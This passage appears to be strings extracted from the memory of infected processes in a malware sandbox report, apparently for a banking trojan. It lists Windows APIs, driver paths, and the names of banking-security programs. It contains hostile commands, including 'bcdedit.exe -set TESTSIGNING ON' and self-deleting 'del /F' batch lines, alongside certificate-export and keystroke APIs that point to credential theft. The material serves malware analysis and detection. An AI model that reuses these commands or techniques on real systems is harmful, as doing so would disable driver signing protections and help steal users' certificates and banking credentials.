ON</pre><pre>%s\drivers\%s.sys</pre><pre>\\.\NtSecureSys</pre><pre>ntdll.dll</pre><pre>svchost.exe</pre><pre>EUDC\%d</pre><pre>KeDelayExecutionThread</pre><pre>WinExec</pre><pre>KERNEL32.dll</pre><pre>ExitWindowsEx</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>RegCloseKey</pre><pre>RegFlushKey</pre><pre>RegCreateKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>msvcrt.dll</pre><b>uhahbe.exe_1760_rwx_00BE0000_0006E000:</b><pre>.text</pre><pre>`.data</pre><pre>.idata</pre><pre>@.reloc</pre><pre>PSSSSSSh</pre><pre>bcdedit.exe -set TESTSIGNING ON</pre><pre>%s\drivers\%s.sys</pre><pre>\\.\NtSecureSys</pre><pre>ntdll.dll</pre><pre>svchost.exe</pre><pre>EUDC\%d</pre><pre>KeDelayExecutionThread</pre><pre>WinExec</pre><pre>KERNEL32.dll</pre><pre>ExitWindowsEx</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>RegCloseKey</pre><pre>RegFlushKey</pre><pre>RegCreateKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>msvcrt.dll</pre><pre>Invalid parameter passed to C runtime function.</pre><pre>0123456789</pre><pre>:$:,:4:<</pre><pre>cRt.1</pre><pre>@[.cZ</pre><pre>http://www.google.com/</pre><pre>http://www.bing.com/</pre><pre>REPORT</pre><pre>bcdfghjklmnpqrstvwxzRegDeleteKeyExW</pre><pre>HTTP/1.1</pre><pre>userenv.dll</pre><pre>del "%s"</pre><pre>if exist "%s" goto d</pre><pre>del /F "%s"</pre><pre>gdiplus.dll</pre><pre>GdiplusShutdown</pre><pre>%3<8645=</pre><pre>7! *.gagZce{(#--2{}s %%;wdX</pre><pre>6019>6*//</pre><pre>0*18 2$4</pre><pre>! <47.ggt?45</pre><pre>L$$</pre><pre>w%fkN</pre><pre>m9.td</pre><pre>t.Ht$HHt</pre><pre>zcÁ</pre><pre>GetKeyboardState</pre><pre>MsgWaitForMultipleObjects</pre><pre>RegCreateKeyExW</pre><pre>RegQueryInfoKeyW</pre><pre>RegDeleteKeyW</pre><pre>RegOpenKeyExW</pre><pre>RegEnumKeyExW</pre><pre>CryptGetKeyParam</pre><pre>CryptImportKey</pre><pre>CryptDestroyKey</pre><pre>PathIsURLW</pre><pre>UrlUnescapeA</pre><pre>SHLWAPI.dll</pre><pre>ShellExecuteW</pre><pre>Secur32.dll</pre><pre>ole32.dll</pre><pre>WS2_32.dll</pre><pre>CertDeleteCertificateFromStore</pre><pre>CertOpenSystemStoreW</pre><pre>CertCloseStore</pre><pre>CertEnumCertificatesInStore</pre><pre>CertDuplicateCertificateContext</pre><pre>PFXExportCertStoreEx</pre><pre>PFXImportCertStore</pre><pre>CRYPT32.dll</pre><pre>HttpSendRequestExA</pre><pre>HttpQueryInfoA</pre><pre>InternetCrackUrlA</pre><pre>HttpOpenRequestA</pre><pre>HttpEndRequestA</pre><pre>HttpAddRequestHeadersA</pre><pre>WININET.dll</pre><pre>OLEAUT32.dll</pre><pre>NETAPI32.dll</pre><pre>IPHLPAPI.DLL</pre><pre>VERSION.dll</pre><pre>6f6F6S6b6l6</pre><pre>2#3(3]3{3</pre><pre>0 0,000<0@0\0`0</pre><pre>urlmon.dll</pre><pre>kernel32.dll</pre><pre>\StringFileInfo\xx\%s</pre><pre>Wadvapi32.dll</pre><pre>cabinet.dll</pre><pre>rapport</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s</pre><pre>launchpadshell.exe</pre><pre>dirclt32.exe</pre><pre>wtng.exe</pre><pre>prologue.exe</pre><pre>pcsws.exe</pre><pre>fdmaster.exe</pre><pre>"%s" %s</pre><pre>/c "%s"</pre><pre>shell32.dll</pre><pre>%Documents and Settings%\%current user%\Local Settings\Temp</pre><pre>%Documents and Settings%\%current user%\Local Settings\Application Data</pre><pre>Global\{01E22063-0823-4088-6532-C4CE7D78E7DC}</pre><b>Explorer.EXE_1948_rwx_02470000_0006E000:</b><pre>.text</pre><pre>`.data</pre><pre>.idata</pre><pre>@.reloc</pre><pre>PSSSSSSh</pre><pre>bcdedit.exe -set TESTSIGNING ON</pre><pre>%s\drivers\%s.sys</pre><pre>\\.\NtSecureSys</pre><pre>ntdll.dll</pre><pre>svchost.exe</pre><pre>EUDC\%d</pre><pre>KeDelayExecutionThread</pre><pre>WinExec</pre><pre>KERNEL32.dll</pre><pre>ExitWindowsEx</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>RegCloseKey</pre><pre>RegFlushKey</pre><pre>RegCreateKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>msvcrt.dll</pre><pre>Invalid parameter passed to C runtime function.</pre><pre>0123456789</pre><pre>:$:,:4:<</pre><pre>cRt.1</pre><pre>@[.cZ</pre><pre>http://www.google.com/</pre><pre>http://www.bing.com/</pre><pre>REPORT</pre><pre>bcdfghjklmnpqrstvwxzRegDeleteKeyExW</pre><pre>HTTP/1.1</pre><pre>userenv.dll</pre><pre>del "%s"</pre><pre>if exist "%s" goto d</pre><pre>del /F "%s"</pre><pre>gdiplus.dll</pre><pre>GdiplusShutdown</pre><pre>%3<8645=</pre><pre>7! *.gagZce{(#--2{}s %%;wdX</pre><pre>6019>6*//</pre><pre>0*18 2$4</pre><pre>! <47.ggt?45</pre><pre>L$$</pre><pre>w%fkN</pre><pre>m9.td</pre><pre>t.Ht$HHt</pre><pre>zcÁ</pre><pre>GetKeyboardState</pre><pre>MsgWaitForMultipleObjects</pre><pre>RegCreateKeyExW</pre><pre>RegQueryInfoKeyW</pre><pre>RegDeleteKeyW</pre><pre>RegOpenKeyExW</pre><pre>RegEnumKeyExW</pre><pre>CryptGetKeyParam</pre><pre>CryptImportKey</pre><pre>CryptDestroyKey</pre><pre>PathIsURLW</pre><pre>UrlUnescapeA</pre><pre>SHLWAPI.dll</pre><pre>ShellExecuteW</pre><pre>Secur32.dll</pre><pre>ole32.dll</pre><pre>WS2_32.dll</pre><pre>CertDeleteCertificateFromStore</pre><pre>CertOpenSystemStoreW</pre><pre>CertCloseStore</pre><pre>CertEnumCertificatesInStore</pre><pre>CertDuplicateCertificateContext</pre><pre>PFXExportCertStoreEx</pre><pre>PFXImportCertStore</pre><pre>CRYPT32.dll</pre><pre>HttpSendRequestExA</pre><pre>HttpQueryInfoA</pre><pre>InternetCrackUrlA</pre><pre>HttpOpenRequestA</pre><pre>HttpEndRequestA</pre><pre>HttpAddRequestHeadersA</pre><pre>WININET.dll</pre><pre>OLEAUT32.dll</pre><pre>NETAPI32.dll</pre><pre>IPHLPAPI.DLL</pre><pre>VERSION.dll</pre><pre>6f6F6S6b6l6</pre><pre>2#3(3]3{3</pre><pre>0 0,000<0@0\0`0</pre><pre>urlmon.dll</pre><pre>kernel32.dll</pre><pre>\StringFileInfo\xx\%s</pre><pre>Wadvapi32.dll</pre><pre>cabinet.dll</pre><pre>rapport</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s</pre><pre>launchpadshell.exe</pre><pre>dirclt32.exe</pre><pre>wtng.exe</pre><pre>prologue.exe</pre><pre>pcsws.exe</pre><pre>fdmaster.exe</pre><pre>"%s" %s</pre><pre>/c "%s"</pre><pre>shell32.dll</pre><pre>%Documents and Settings%\%current user%\Local Settings\Temp</pre><pre>%Documents and Settings%\%current user%\Local Settings\Application Data</pre><pre>Global\{01E22063-0823-4088-6532-C4CE7D78E7DC}</pre></pre></pre></pre>